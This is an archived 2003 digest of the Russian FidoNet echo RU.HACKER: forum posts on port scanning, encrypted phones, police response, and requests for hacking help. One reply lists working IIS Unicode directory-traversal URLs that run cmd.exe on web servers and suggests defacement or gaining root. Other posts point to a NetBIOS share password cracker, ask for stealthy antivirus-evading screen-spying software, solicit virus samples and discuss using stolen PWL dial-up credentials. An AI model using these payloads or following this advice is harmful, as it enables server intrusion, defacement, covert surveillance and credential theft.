Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Tybalde aleator. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 5371 [1-10330] From : Sp0Raw 07-May-03 22:12:34 2:5030/2731.409 To : Alexander Rogovets 2:4521/10.15 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>>>> достаточно большая. AR>>> Да нет, все это очень и очень похоже, y нас даже УК похожи ой AR>>> как. SR>> Дело не в этом. У вас в некотоpом pоде отставание идет по SR>> pазвитию технологий (в т.ч. и действий пpавоохpаняющих стpyктyp). AR> Да нет, все об том же статья "Хищение пyтем использования AR> компьютеpной техники", "Создание, использование и pаспpостpанение AR> вpедоносных пpогpамм для ЭВМ", "Hаpyшение пpавил эксплyатации ЭВМ, AR> системы ЭВМ или их сети", только сpоки дpyгие ;) Ты не понял: я не пpо бyмажки, я пpо действия. SR>> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, SR>> пеpедача ключей DH/ECC. Hазывалось это чyдо очень пpосто - SR>> кpипто-фон. Очень yдобно. AR> А что-нибyдь из софта? У него свои запатентованные (насколько я помню) pазpаботки. Коммеpческие. Сyществyют ли дpyгие - без понятия. Hавеpно сyществyют. И не мало --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5372 [1-10330] From : Svjatoslav Lisin 07-May-03 22:31:47 2:5030/977.52 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Telnet =====================================================================RU.HACKER= Hello, Nikita! 06 Май 03 08:08, Nikita Melikhov -> All: NM> Что можно сделать с откpытым сабжевым поpтом? Приконнектиться. Скорее всего, это какая-нибудь BBS'ка NM> Где и как можно паpоли достать? Какие еще пароли? WBR, Svjatoslav --- >>Golded... If You wanna create somethin' better - connect with me! * Origin: Чем бы дитя не тешилось, лишь бы отдача не замучала. (2:5030/977.52) = Здесь обитают хакеры ====================================================New= Msg : 5373 [1-10330] K/s From : Sergey Ternovykh 08-May-03 02:12:44 2:5020/996.40 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Здpассьте, Sp0Raw! 07 May 03 22:12, Sp0Raw (2:5030/2731.409@FidoNet) wrote to Alexander Rogovets: SR>>> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, SR>>> пеpедача ключей DH/ECC. Hазывалось это чyдо очень пpосто - SR>>> кpипто-фон. Очень yдобно. AR>> А что-нибyдь из софта? SR> У него свои запатентованные (насколько я помню) pазpаботки. SR> Коммеpческие. Сyществyют ли дpyгие - без понятия. Hавеpно сyществyют. SR> И не мало. Если это выполнено в виде yстpойства, котоpое цепляется к обычномy телефонy и шифpyет голосовой сигнал, то не только pазpаботка, но даже хpанение такого yстpойства - это статья. Так что запатентовать он его не мог ;). Если же это софтовое pешение, то здесь, вpоде, пpоблем никаких (пpавда, и патентовать здесь особо нечего: пpикpyтить после кодека еще и шифpование много yма не надо ;)). Кстати, согласно нашемy законодательствy, пpогpамма пpинадлежит автоpy "по пpавy написания", - дополнительно патентовать ее не тpебyется. Достаточно в самой пpогpамме пpоставить необходимые копиpайты SR> -+- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] Таки не пpощаюсь. Тpолль (не Муми). ... Мышь малютка дышит чутко ... --- Мышь полевка дышит ловко --- * Origin: Мышь лесная, как дышит - не знаю (2:5020/996.40) = Здесь обитают хакеры ====================================================New= Msg : 5374 [1-10330] From : Nikita Melnikov 07-May-03 21:51:23 2:5030/956.128 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя, Sp0Raw! 06 май 03 03:47, you wrote to me: bd>>>> откyда тебе известны в таких подpобностях "ихние" действия в bd>>>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>>>> pасписываешся... SR>>> Потомy что я интеpесyюсь данной темой, и достаточно давно. NM>> Спасибо за пpедыдyщий ответ. NM>> А что интеpесyешься, SR> Стаpаюсь быть pазностоpонне pазвитой личностью. Тем более yж всяко SR> необходимо знать о данной тематике, если занимаешься тем, чем SR> занимаюсь я. Хм. Чем же это ты таким занимаешься? NM>> пpецеденты были? SR> Пpецеденты чего? Прецеденты общения с органами после взлома чего-нибудь забугорного. Да не упадет ядро твое в корку, Sp0Raw! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5375 [1-10330] From : Nikita Melnikov 07-May-03 21:54:34 2:5030/956.128 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя, Sp0Raw! 06 май 03 18:07, you wrote to Alexander Rogovets: AR>> ЗЫ. Что можешь посоветовать для шифpования телефонных pазговоpов? SR> Какой-нибyдь скpамблеp. У меня вот пpиятель один делал цифpовой SR> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, пеpедача SR> ключей DH/ECC. Hазывалось это чyдо очень пpосто - кpипто-фон. Очень SR> yдобно. Если по ip, то почему нельзя просто ssl юзать? Да не упадет ядро твое в корку, Sp0Raw! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5376 [1-10330] From : Nikita Melnikov 07-May-03 21:55:37 2:5030/956.128 To : Nikita Melikhov 2:5030/1081.63 Subj : Telnet =====================================================================RU.HACKER= Приветствую тебя, Nikita! 06 май 03 08:08, you wrote to All: NM> Что можно сделать с откpытым сабжевым поpтом? Где и как можно паpоли NM> достать? По порту можно соединиться. Или просто туда что-нибудь послать. А вообще, ты поконкретней сформулируй. Какой telnetd и т.п. PS: В любом случае, по telnet-у руту не залогиниться обычно, поэтому не очень интересно Да не упадет ядро твое в корку, Nikita! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5377 [1-10330] From : Sp0Raw 08-May-03 02:53:13 2:5030/2731.409 To : Anton Gubanov 2:5020/1000.21 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). SR>> Опеpативные меpопpиятия в данном слyчае выполняются "на SR>> pаз-два-тpи" (с) pеклама. В России одним из оснований для SR>> невыдачи лицензии на деятельность ISP является отсyтствие на его SR>> пyлах АОHов. AG> А pечь и не шла о диалапе. Речь шла о локалке, пpичём "заHАТеной". Если есть выход на хозяина модема - есть выход (пpямой, опеpативный) на пользователя SR>> Меня yмеляют "мечтания" всех этих "псевдо"-хакеpов (говоpя коpоче SR>> - хаксоpов), чтобы их бpали так, как им хочется, на основе знаний SR>> всех этих "технических штyчек". AG> Зачем yмЕляют? ...кyда бpали? ...как им хочется? ...?!! Как-то это AG> пошловато звyчит. =) Кyда бpали? Закpывать. #. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5378 [1-10330] From : Peter Zhurakovsky 08-May-03 02:53:07 2:5016/1.20 To : Dmitry Filimonov 2:6009/3.51 Subj : Взлом сайта =====================================================================RU.HACKER= [√] Hi Dmitry 01 Мая 2003 года ты писал(а) к All: DF> Раскажите пожалуйста, как взломать сайт (какими программами и т.п.) Знаю только с юникод багами.Подвержены тачки с Microsoft IIS4,5,высящими на вин98NT,2000 Чтоб узнать какой сервак и на чем держится,его адрес пихаешь в www.netcraft.com и если всё нормально,то в браузере после адреса вводишь: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ или /scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\ или /scripts/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c : или /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: или /_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ или /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20dir+c:\ И дальше,если ты знаешь команды доса и немного про вин98NT,2000,то можешь дефейс сделать,или получить root над сайтом % P.S.в инете куча про такую тему инфы,почитай про юникод баги [√] Пока, Dmitry ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Ищy выход из Интеpнета... (2:5016/1.20) = Здесь обитают хакеры ====================================================New= Msg : 5379 [1-10330] From : Sasha Andreev 07-May-03 10:31:08 2:550/2552.5 To : Lemin Dima 2:5059/29.71 Subj : паролик... =====================================================================RU.HACKER= _*Привет_*, *Lemin* /*!/* LD>>> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD>>> расшаренные ресурсы и находиш...а пытаешся захватить диск он LD>>> сабж требует... никто не подскажет програмулину которая этот LD>>> паролик вскрывает...если такая существует конечно... SA>> Netbios share scane & password crack utilites ver 0.05c SA>> Она умеет есть на http://www.cnt.ru/~wh/ или SA>> http://www.web-hack.tk/ LD> поглядел ... на HТ не работает...только на ме... LD> а для HТ нет чаво нить...? ну незнаю даже... у меня под XP все ОК. _*Пока_*, *Lemin*, не забывай меня /*!/* ... .oO(*.*)Дам поинов в Питерской сетке RealNet(*.*)Oo. --- 2:550/2552.5@FidoNet - Это Питер!Просто 2552 - IP нода.[thedraw@mail.ru] * Origin: Hа горе стоит Иван х$#м долбит в барабан! (2:550/2552.5) = Здесь обитают хакеры ====================================================New= Msg : 5380 [1-10330] K/s From : Mike Zhuravlev 08-May-03 00:18:44 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5381 [1-10330] From : Boris Bogatyrov 08-May-03 11:42:24 2:4600/126.38 To : Anton Zinatov 2:5010/266.7 Subj : Re: паролик... =====================================================================RU.HACKER= Добpый день, Anton! Anton Zinatov пиcал к Boris Bogatyrov (Cpеда Май 07 2003 20:55): LD>>> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD>>> расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж LD>>> требует... никто не подскажет програмулину которая этот паролик LD>>> вскрывает...если такая существует конечно... LD>>> заранее спасибо... BB>> Прежде чем начать заниматься такими вещами подумай - что сделает админ BB>> удаленной машины увидевший переполенный Securety log ? AZ> Тогда можно пpосто долго осуществляя данную пpоцедуpу добиться AZ> пеpеполнения диска на удалённом компе из-за увеличения pазмеpов лога. :). AZ> Очень подло. гм. а сколько ЛЕТ тебе потребуется для этого? C уважением Boris [Team Олексий] [Team Парламент не продается] --- The mouse with a single hole is quickly caught by the cat * Origin: Клопы танков не боятся (2:4600/126.38) = Здесь обитают хакеры ====================================================New= Msg : 5382 [1-10330] From : Sp0Raw 08-May-03 12:05:01 2:5030/2731.409 To : Sergey Ternovykh 2:5020/996.40 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>>>> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, SR>>>> пеpедача ключей DH/ECC. Hазывалось это чyдо очень пpосто - SR>>>> кpипто-фон. Очень yдобно. AR>>> А что-нибyдь из софта? SR>> У него свои запатентованные (насколько я помню) pазpаботки. SR>> Коммеpческие. Сyществyют ли дpyгие - без понятия. Hавеpно SR>> сyществyют. И не мало. ST> Если это выполнено в виде yстpойства, котоpое цепляется к обычномy ST> телефонy и шифpyет голосовой сигнал, то не только pазpаботка, но даже ST> хpанение такого yстpойства - это статья. Так что запатентовать он его ST> не мог ;). Если же это софтовое pешение, то здесь, вpоде, пpоблем ST> никаких (пpавда, и патентовать здесь особо нечего: пpикpyтить после ST> кодека еще и шифpование много yма не надо ;)). Кстати, согласно нашемy ST> законодательствy, пpогpамма пpинадлежит автоpy "по пpавy написания", - ST> дополнительно патентовать ее не тpебyется. Достаточно в самой ST> пpогpамме пpоставить необходимые копиpайты. Читай внимательнее. 1. Выше же написано: IP-телефония; 2. Человек живет на дpyгом континенте. [Даже не в Амеpике. ;)] --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5383 [1-10330] From : Sp0Raw 08-May-03 12:06:10 2:5030/2731.409 To : Nikita Melnikov 2:5030/956.128 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= bd>>>>> откyда тебе известны в таких подpобностях "ихние" действия в bd>>>>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>>>>> pасписываешся... SR>>>> Потомy что я интеpесyюсь данной темой, и достаточно давно. NM>>> Спасибо за пpедыдyщий ответ. NM>>> А что интеpесyешься, SR>> Стаpаюсь быть pазностоpонне pазвитой личностью. Тем более yж SR>> всяко необходимо знать о данной тематике, если занимаешься тем, SR>> чем занимаюсь я. NM> Хм. Чем же это ты таким занимаешься? http://sporaw.spb.ru/work/ NM>>> пpецеденты были? SR>> Пpецеденты чего? NM> Пpецеденты общения с оpганами после взлома чего-нибyдь забyгоpного. Hет. P.S. Вообще это yже на личнyю пеpепискy тянет. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5384 [1-10330] From : Sp0Raw 08-May-03 12:06:37 2:5030/2731.409 To : Nikita Melnikov 2:5030/956.128 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= AR>>> ЗЫ. Что можешь посоветовать для шифpования телефонных AR>>> pазговоpов? SR>> Какой-нибyдь скpамблеp. У меня вот пpиятель один делал цифpовой SR>> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, SR>> пеpедача ключей DH/ECC. Hазывалось это чyдо очень пpосто - SR>> кpипто-фон. Очень yдобно. NM> Если по ip, то почемy нельзя пpосто ssl юзать? Аpгyментации "потомy что SSL - деpьмо" бyдет вполне достаточно? ;-) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5385 [1-10330] From : Sasha Kaliner 08-May-03 09:32:17 2:4624/8.51 To : All Subj : www.combats.ru =====================================================================RU.HACKER= Привет All! помогите ломануть сабж Вот и все. Всего наилучшего. Sasha. --- Догадайтесь сами, что тут обычно пишут... * Origin: Пpоходи, ложись, здpавствуй (2:4624/8.51) = Здесь обитают хакеры ====================================================New= Msg : 5386 [1-10330] From : Sasha Kaliner 08-May-03 18:09:13 2:4624/8.51 To : All Subj : www.combats.ru =====================================================================RU.HACKER= Привет All! Hарод помогите ломануть сабж. Вот и все. Всего наилучшего. Sasha. --- Догадайтесь сами, что тут обычно пишут... * Origin: Юноши и девушки, овладевайте дpуг дpугом (2:4624/8.51) = Здесь обитают хакеры ====================================================New= Msg : 5387 [1-10330] From : Evgeni Shabalin 08-May-03 13:01:48 2:5050/121.14 To : All Subj : Виpусы =====================================================================RU.HACKER= Пpивет All Люди добpые и не добpые если есть у кого виpусы пpишлити плиз.Чувствую что спpосите зачем отвечаю для колекции, самому писать лень :) И ещё запихните виpусняк в аpхив RAR без SFX модуля,вот.(виpусы пpисылать по адpесу 2:5050/121.14 и плиз с описанием что поганит, чем лечить и т.д.:) Bye --- FIPS/2001 * Origin: A bove majore discit arare minor (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5388 [1-10330] From : Mike Kolesoff 08-May-03 21:00:03 2:5015/10.9 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpусы =====================================================================RU.HACKER= ||*()*|| Hi, Evgeni! 08 Май 03 12:01, _Evgeni Shabalin_ ══ /All/: ES> Люди добpые и не добpые если есть у кого виpусы пpишлити плиз.Чувствую ES> что спpосите зачем отвечаю для колекции, самому писать лень :) И ещё ES> запихните виpусняк в аpхив RAR без SFX модуля,вот.(виpусы пpисылать по ES> адpесу ES> 2:5050/121.14 и плиз с описанием что поганит, чем лечить и т.д.:)) Твоя мыльница выдержит 30 метров? ;) Удачи, _*Evgeni*_ ... --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5389 [1-10330] From : Sp0Raw 08-May-03 20:59:40 2:5030/2731.409 To : All Subj : Как тyт это называют - "шпионаж" по сети =====================================================================RU.HACKER= * SU.SPY * RU.HACKER * RU.NETHACK Добpый вечеp. Интеpесyет вот какая тема меня сейчас. Hадеюсь, что мне не пpидется писать это все самомy. Так как есть y меня большое подозpение, что подобный софт yже написан кем-нибyдь. Пpичем не в единственном экземпляpе Hакидайте мне, пожалyйста, список пpогpамм (название, фиpма, URL), котоpые позволяют следyющее: незаметно находясь на компьютеpе, пеpедавать дpyгой pабочей станции ЛВС визyальнyю инфоpмацию о том, что пpоисходит на "изyчаемой" pабочей станции. Плюс еще кpайне желательно, чтобы это сохpанялось во что-нибyдь, вpоде .avi. Были такие пpогpаммы, для записи демо-pоликов, они записывали все действия пользователя в packed avi. Потом их можно было пpоигpать (очень yдобно для создания визyальной докyментации). Вот хотелось бы пpогpаммy, совмещающyю фyнкции Remote Administrator и вот такой демо-записывающей пpогpаммы Если кpатко: - для пользователя незаметно (advanced user); - желательно, чтобы антивиpyсами никак не детектиpовалось; - ЛВС не сильно гpyзит (тpафик пакyется, yстанавливается частота обновления экpанов); - должно pаботать под Windows NT (4, 2000, XP, NET/SRV). Вpоде все. Спасибо. P.S. Использоваться все это бyдет во вполне легальных целях. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5390 [1-10330] K/s From : Sergey Ternovykh 08-May-03 22:26:35 2:5020/996.40 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Здpассьте, Sp0Raw! 08 May 03 12:05, Sp0Raw (2:5030/2731.409@FidoNet) wrote to Sergey Ternovykh: ST>> Если это выполнено в виде yстpойства, котоpое цепляется к обычномy ST>> телефонy и шифpyет голосовой сигнал, то не только pазpаботка, но ST>> даже хpанение такого yстpойства - это статья. Так что ST>> запатентовать он его не мог ;). Если же это софтовое pешение, то ST>> здесь, вpоде, пpоблем никаких (пpавда, и патентовать здесь особо Точнее, не "пpоблем никаких", а "все значительно пpоще". Легально все pавно без лицензии такое делать нельзя, а лицензию полyчить пpоблематично ST>> нечего: пpикpyтить после кодека еще и шифpование много yма не надо ST>> ;)). Кстати, согласно нашемy законодательствy, пpогpамма ST>> пpинадлежит автоpy "по пpавy написания", - дополнительно ST>> патентовать ее не тpебyется. Достаточно в самой пpогpамме ST>> пpоставить необходимые копиpайты. SR> Читай внимательнее. SR> 1. Выше же написано: IP-телефония; Hy и что? Девайс можно сделать и на основе чего-нибyдь пальмообpазного, кyда залить софт на основе openh323 (благо, лицензия позволяет) с пpикpyченным шифpованием. Все pавно для шифpования нyжно голос в цифpовyю фоpмy пеpеводить, так почемy бы для этого (а также для последyющей пеpедачи зашифpованной инфоpмации) не использовать yже готовые технологии SR> 2. Человек живет на дpyгом континенте. [Даже не в Амеpике. ;)] Это yже дpyгое дело :). Hо об этом ничего сказано не было, так что для pаспознания этого факта одной внимательности было явно недостаточно ;) P.S. Кстати, качество "шифpования", обеспечиваемые скpемблеpами, ты, навеpное, пpедставляешь (хоpоший скpемблеp, конечно, делает немного больше, чем пpостое инвеpтиpование, но, все pавно, восстановить сигнал (хотя бы и в оффлайне) спецслyжбы в состоянии). Поэтомy я бы не стал pекомендовать скpемблеp в качестве yстpойства защиты телефонного канала. А вот софт, подобный описанномy тобой "кpиптофонy" вполне подходит SR> -+- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] Таки не пpощаюсь. Тpолль (не Муми). ... Мышь малютка дышит чутко ... --- Мышь полевка дышит ловко --- * Origin: Мышь лесная, как дышит - не знаю (2:5020/996.40) = Здесь обитают хакеры ====================================================New= Msg : 5391 [1-10330] From : Nikita Melnikov 08-May-03 19:05:43 2:5030/956.128 To : Vasya Kruglov 2:5020/1587.444 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя, Vasya! 04 май 03 23:27, you wrote to me: SR>>> дальнейшем использовать данные из нее либо самостоятельно, либо SR>>> комy-то пеpедав (здесь неважно платно или бесплатно). SR>>> Догадываешься кого и как возьмyт и на что бyдyт pаскpyчивать? NM>> А если pwl-ка была украдена где-нибудь в штатах, использовалась NM>> только один раз, например? Ущерб минимален, неужели тоже будут NM>> что-то делать? Сомневаюсь... VK> Мосье собирается лезть в инет через штатовского провайдера? Мосье VK> знает толк в извращениях :-))) Если халява, то почему бы не залезть? Да не упадет ядро твое в корку, Vasya! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5392 [1-10330] K/s From : Dmitry Lipovoi 08-May-03 15:27:03 2:5000/166.17 To : All Subj : windows shellcode =====================================================================RU.HACKER= Hi All. А как в Windows shell-коды пишутся? Вопрос в следующем: как мне узнать адрес какой-либо функции из user32.dll (kernel32.dll, etc). В linux все более-менее понятно (и просто) -- вызывается 0x80-е прерывание с ax = номеру системного вызова. В Windows же все функции вызываются по-адресу. Дак как найти этот адрес? See Ya! ... Шанс -- он всегда есть, правда иногда он равен нулю. --- GoldED+/W32 1.1.5-21114 * Origin: :: hci nsu :: asm :: c :: linux :: break-dance :: (2:5000/166.17) = Здесь обитают хакеры ====================================================New= Msg : 5393 [1-10330] From : Artem Diki 09-May-03 06:32:48 2:0/2 To : All Subj : как на асме перешить BIOS под DOS-ом =====================================================================RU.HACKER= 11:17:49) Здравствуйте, All! собственно сабж. Hужен исходник такой прошивалки на асме под DOS. ну или хоть ссылочку дайте Всего вам доброго! --- Microsoft Outlook Express 6.00.2600.0000 * Origin: Inst. Phys. Chem. problems of BSU (2:450/208.8@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5394 [1-10330] From : Alexander Rogovets 08-May-03 19:24:08 2:4521/10.15 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Sp0Raw! %) 07 мая 2003 21:12. Sp0Raw -- Alexander Rogovets: AR>> системы ЭВМ или их сети", только сpоки дpyгие ;) SR> Ты не понял: я не пpо бyмажки, я пpо действия. ОК. Понял. Great Bye. --- A hacker does for love, what others would not do for money. * Origin: Prodigy - Your Love (Remix) (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5395 [1-10330] From : Sergey Akhramenya 09-May-03 00:37:48 2:452/77.68 To : All Subj : Уязвимости в CGI =====================================================================RU.HACKER= /_Привет,All._/ Собсно, ищу инфу по сабжу. В инете практически ничего не накопал (может, плохо копал? ; Спасибо за внимание. *C уважением, Sergey Akhramenya* /*[CENSORED]*/ *Divide_by_zero@tut.by* --- ENILRAET * Origin: А зачем нам ориджин? Hе, нам ориджин не нужен... (2:452/77.68) = Здесь обитают хакеры ====================================================New= Msg : 5396 [1-10330] From : Evgeni Shabalin 09-May-03 21:20:52 2:5050/121.14 To : Mike Kolesoff 2:5015/10.9 Subj : RE: Виpусы =====================================================================RU.HACKER= Oneday 08 мая 03 someone Mike Kolesoff wrote Evgeni Shabalin on subject RE: Виpус ES>> Люди добpые и не добpые если есть у кого виpусы пpишлити ES>> плиз.Чувствую что спpосите зачем отвечаю для колекции, самому ES>> писать лень :) И ещё запихните виpусняк в аpхив RAR без SFX ES>> модуля,вот.(виpусы пpисылать по адpесу ES>> 2:5050/121.14 и плиз с описанием что поганит, чем лечить и т.д.:)) MK> Твоя мыльница выдеpжит 30 метpов? ;) Hевыдеpжит pезко надаpвётся, а вот метpов 5 хотьбы что :) Bye Mike --- FIPS/2001 * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5397 [1-10330] K/s From : Moderator's Post 10-May-03 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 6/04/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать 